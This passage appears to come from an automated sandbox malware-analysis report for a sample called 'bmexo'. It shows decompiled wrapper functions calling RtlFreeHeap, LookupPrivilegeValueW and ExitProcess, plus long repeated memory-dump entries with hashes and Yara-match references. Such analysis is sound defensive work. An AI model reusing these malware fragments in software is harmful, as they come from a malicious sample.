                                          • Instruction ID: 5112eb7d04df1d6e50f339e712a9d98793db7acbdec2b9c88685dfce6d12f60e
                                          • Opcode Fuzzy Hash: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
                                          • Instruction Fuzzy Hash: 0EE01AB12002086BDB14DF49DC45E9737ACEF88654F118155BA085B241C530F9108AB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 266 41a620-41a651 call 41af60 RtlFreeHeap
                                          C-Code - Quality: 100%
                                          			E0041A620(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xc90; // 0xc90
				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                          0x0041a62f
                                          0x0041a637
                                          0x0041a64d
                                          0x0041a651

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00409113,?,?,00409113,00000060,00000000,00000000,?,?,00409113,?,00000000), ref: 0041A64D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                          • Instruction ID: e76337afa916636dc7999d0b0cc11d2e66c0cc36247d0f50dc268ede5031f4cd
                                          • Opcode Fuzzy Hash: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                          • Instruction Fuzzy Hash: 14E012B1200208ABDB14EF89DC49EA737ACEF88764F118159BA085B242C630E9208AB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A780 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 269 41a780-41a7b4 call 41af60 LookupPrivilegeValueW
                                          C-Code - Quality: 100%
                                          			E0041A780(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041AF60( *((intOrPtr*)(_a4 + 0xa1c)), _a4, _t7 + 0xca8,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                          0x0041a79a
                                          0x0041a7b0
                                          0x0041a7b4

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D5C2,0040D5C2,00000041,00000000,?,00409185), ref: 0041A7B0
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
                                          • Instruction ID: f191f6caa62469aa0aeb0b25a98ea8bb3e9aa7cd5fa1fede7adac256a7a22315
                                          • Opcode Fuzzy Hash: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
                                          • Instruction Fuzzy Hash: 4EE01AB12002086BDB10DF49CC45EE737ADEF89664F118155BA0C57241C530E8158AB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A660 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041A660(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041AF60( *((intOrPtr*)(_a4 + 0xa18)), _t5, _t5 + 0xc98,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x36);
				ExitProcess(_a8);
			}



                                          0x0041a663
                                          0x0041a67a
                                          0x0041a688

                                          APIs
                                          • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A688
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                          • Instruction ID: 43fab5bc382f8dbf035fa71370f402dcb25f1a4f198c16d6a3d81994ba933d62
                                          • Opcode Fuzzy Hash: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                          • Instruction Fuzzy Hash: 70D017726002187BD620EB99CC89FD777ACDF49BA4F1580A5BA0C6B242C934BA5187E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 00406EA5 Relevance: 1.3, Strings: 1, Instructions: 17COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 16%
                                          			E00406EA5(void* __eax, void* __ecx, void* __edx) {

				_pop(ss);
				asm("movsd");
				return 1;
			}



                                          0x00406ea9
                                          0x00406eb4
                                          0x00406ec4

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: @'3
                                          • API String ID: 0-1540810063
                                          • Opcode ID: 960ba21da6da5e55392697c576a86b5644a44c5be8df4fb06fecea4259f9f9d3
                                          • Instruction ID: 723d2e3db20951e9b4be51d60834d9f1d75f25b8c761883222dbd5c2e59154c3
                                          • Opcode Fuzzy Hash: 960ba21da6da5e55392697c576a86b5644a44c5be8df4fb06fecea4259f9f9d3
                                          • Instruction Fuzzy Hash: 67C08C2AE040A022C0380C4C34902F6E3A8F747121F2032E3D88CBB941C042C5D001C8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041730E Relevance: .0, Instructions: 18COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 16%
                                          			E0041730E(void* __fp0) {
				intOrPtr _t8;

				asm("a16 out dx, eax");
				_push(es);
				 *0x1b = _t8;
				asm("insd");
				asm("stosb");
				return 0x1b;
			}




                                          0x0041730e
                                          0x00417315
                                          0x00417316
                                          0x00417318
                                          0x00417319
                                          0x00417326

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bb093abe361113be9425131f66226babf64f68918a8a1c3f93381d6269f2b4a3
                                          • Instruction ID: da5458df7d5afa84532e9dacf5e10b5b24371f7c4eecfd3cba32dda5b4d8bc21
                                          • Opcode Fuzzy Hash: bb093abe361113be9425131f66226babf64f68918a8a1c3f93381d6269f2b4a3
                                          • Instruction Fuzzy Hash: 14C08C32A078280ECA018CACB8004F0F7B4D64B2A1B4232A2CA08A71118822C80156E8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009A10D0 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                          • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                          • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                          • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009A0060 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                          • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                          • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                          • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009A01D4 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                          • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                          • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                          • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009A010C Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                          • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                          • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                          • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009A1148 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                          • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                          • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                          • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099F8CC Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                          • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                          • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                          • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099F938 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                          • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                          • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                          • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009A1930 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                          • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                          • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                          • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099FAB8 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                          • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099FA20 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                          • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                          • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                          • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099FA50 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                          • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                          • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                          • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099FBE8 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                          • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                          • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                          • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099FB50 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
